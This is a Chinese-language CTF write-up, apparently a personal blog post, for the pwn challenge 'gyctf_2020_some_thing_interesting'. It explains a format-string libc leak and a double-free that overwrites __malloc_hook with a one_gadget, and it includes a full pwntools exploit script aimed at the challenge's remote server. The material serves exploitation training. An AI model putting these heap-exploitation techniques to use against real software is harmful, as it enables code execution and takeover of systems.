gyctf_2020_some_thing_interesting:
保护全开
漏洞分析:
字符串只比较到第14个,还有5个我们可以任意填
这里有个格式化字符串漏洞
指针未清零
漏洞利用:
gbd调试可以看到偏移的地址指向啥,例如偏移17,指向__libc_start_main+240,我们靠此泄露libc
再利用doublefree,分配chunk到malloc_hook-0x23中,改malloc_hook为og
去getshell
exp:
这题free时会释放两个堆,甚至帮我们绕过doublefree的检查
from pwn import *
#from LibcSearcher import *
local_file = './gyctf_2020_some_thing_interesting'
local_libc = './libc-2.23.so'
remote_libc = './libc-2.23.so'
#remote_libc = '/home/glibc-all-in-one/libs/buu/libc-2.23.so'
select = 1
if select == 0:
r = process(local_file)
libc = ELF(local_libc)
else:
r = remote('node4.buuoj.cn',29792 )
libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se = lambda data :r.send(data)
sa = lambda delim,data :r.sendafter(delim, data)
sl = lambda data :r.sendline(data)
sla = lambda delim,data :r.sendlineafter(delim, data)
sea = lambda delim,data :r.sendafter(delim, data)
rc = lambda numb=4096 :r.recv(numb)
rl = lambda :r.recvline()
ru = lambda delims :r.recvuntil(delims)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
info = lambda tag, addr :r.info(tag + ': {:#x}'.format(addr))
o_g_32_old = [0x3ac3c, 0x3ac3e, 0x3ac42, 0x3ac49, 0x5faa5, 0x5faa6]
o_g_32 = [0x3ac6c, 0x3ac6e, 0x3ac72, 0x3ac79, 0x5fbd5, 0x5fbd6]
o_g_old = [0x45216,0x4526a,0xf02a4,0xf1147]
o_g = [0x45226, 0x4527a, 0xf0364, 0xf1207]
def debug(cmd=''):
gdb.attach(r,cmd)
#-----------------------
def check():
sla('Now please tell me what you want to do :','0')
def add(o_length,o_content,re_length,re_content):
sla('Now please tell me what you want to do :','1')
sla('O\'s length : ',str(o_length))
sa('> O : ',o_content)
sla('> RE\'s length : ',str(re_length))
sa('> RE : ',re_content)
def edit(index,o_content,re_content):
sla('Now please tell me what you want to do :','2')
sla('Oreo ID : ',str(index))
sa('> O : ',o_content)
sa('> RE : ',re_content)
def delete(index):
sla('Now please tell me what you want to do :','3')
sla('Oreo ID : ',str(index))
def show(index):
sla('Now please tell me what you want to do :','4')
sla('Oreo ID : ',str(index))
#-----------------------
sla('Input your code please:','OreOOrereOOreO%17$p')
check()
ru('Your Code is OreOOrereOOreO0x')
libc_base=int(rc(12),16)-240-libc.sym['__libc_start_main']
malloc_hook=libc_base+libc.sym['__malloc_hook']
#realloc=libc_base+libc.sym['realloc']
og=o_g_old[3]+libc_base
print hex(libc_base)
add(0x60,'a',0x60,'b')
delete(1)
delete(1)
edit(1,p64(0),p64(malloc_hook-0x23))
add(0x60,p64(0),0x68,'a'*0x13+p64(og))
sla('Now please tell me what you want to do :','1')
sla('O\'s length : ',str(0x10))
#debug()
r.interactive()
其他:
感觉调试总是我的短板
跟着这位师傅调
https://blog.csdn.net/mcmuyanga/article/details/114643601
感觉不是很好找
各位师傅可有更好的办法?